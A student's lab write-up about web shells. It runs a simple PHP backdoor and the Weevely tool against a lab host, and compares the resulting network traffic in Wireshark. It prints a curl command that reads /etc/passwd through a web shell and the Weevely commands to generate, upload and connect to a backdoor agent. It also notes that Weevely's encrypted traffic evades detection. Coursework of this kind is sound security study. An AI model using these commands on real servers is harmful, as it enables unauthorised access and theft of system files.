Class Activity 8.1 - Weevely

Webshells like simple-backdoor.php are effective but are not terribly stealthy. Basic IDS/IPS systems will be able to detect "shell-like" behavior by seeing content that looks like commands, prompts and sensitive files like /etc/passwd.

Wireshark Capture of traditional webshell

Target pippin with a traditional websell and capture a dump of /etc/passwd using wireshark on your interface.

start wireshark
Run the following command to get the dump of etc/password

sudo curl http://10.0.5.25:80/upload/simple-backdoor.php?cmd=cat+/etc/passwd

Deliverable 1. Provide a screenshot that shows the relevant TCP stream similar to the one below. Create a capture filter on port 80 when you do so.

The following packet in wireshark is my GET request asking the server to dump the /etc/passwd file

The follwoing packet in wireshark is the HTTP response 200 meaning that the server accepted my request, and sent me back the dump of /etc/passwd

In Line-based text data you should be able to see the dump in the dropdown!

Weevely

Helpful resource: https://github.com/epinna/weevely3/wiki/Getting-Started

Deliverable 2. Investigate weevely (a tool in kali). Create a php agent that is uniquely named, upload the agent to pippin and carry on a session.

Weevely is an advanced web shell whereby shell instances can be 'managed' by an agent instance. The initial PHP script creates a funcational backdoor for dynamic remote administration and utilitzes obfuscated request traffic to avoid detection.

https://support.alertlogic.com/hc/en-us/articles/115005896483-PHP-Web-Shell-Weevely

Generate Weevely Agent

sudo weevely generate <password> <file.php>

Put the file in the Pippin server

put <file.php>

Start a Session

Use the following command to start a weevley session with the Pippin host

sudo weevely http://10.0.5.25/path/to/file.php <password>

Once you have a successful session, run the following commands:

id
whomai

Wireshark capture of /etc/passwd

Deliverable 3. Show a dump of /etc/passwd on wireshark. Make sure to use a capture filter for port 80.

Capture of Weevely getting the /etc/passwd dump. When we are making the request for this file, the server is sending the information over the network encrypted. Weevley then has a key to decrypt the information and show the user (me) the /etc/passwd dump in the terminal. As the data is traveling over the network encrypted it is much more stealhly and less likly to be detected then if it was in plain text or backdoor commands.

You will notice that there are 2 HTTP 200 OK packets. The first packet is most likely some encrypted communication from the server about how to decrypt the /etc/passwd file. We can't know for sure what it is as its encrypted.

Below is the second HTTP 200 OK packet and we know that this one contains the actual /etc/passwd dump as its much longer then the first one
- truncated means that the information is much longer it's just showing a shorter version.

As you see below, running cat/etc/passwd displays unencrypted to the user!

PreviousModule 8: Reverse Shells NextClass Activity 8.2 - Reverse Shells

Last updated 10 months ago

hashtagWireshark Capture of traditional webshell

hashtagDeliverable 1. Provide a screenshot that shows the relevant TCP stream similar to the one below. Create a capture filter on port 80 when you do so.

hashtagWeevely

hashtagDeliverable 2. Investigate weevely (a tool in kali). Create a php agent that is uniquely named, upload the agent to pippin and carry on a session.

hashtagGenerate Weevely Agent

hashtagPut the file in the Pippin server

hashtagStart a Session

hashtagWireshark capture of /etc/passwd

hashtagDeliverable 3. Show a dump of /etc/passwd on wireshark. Make sure to use a capture filter for port 80.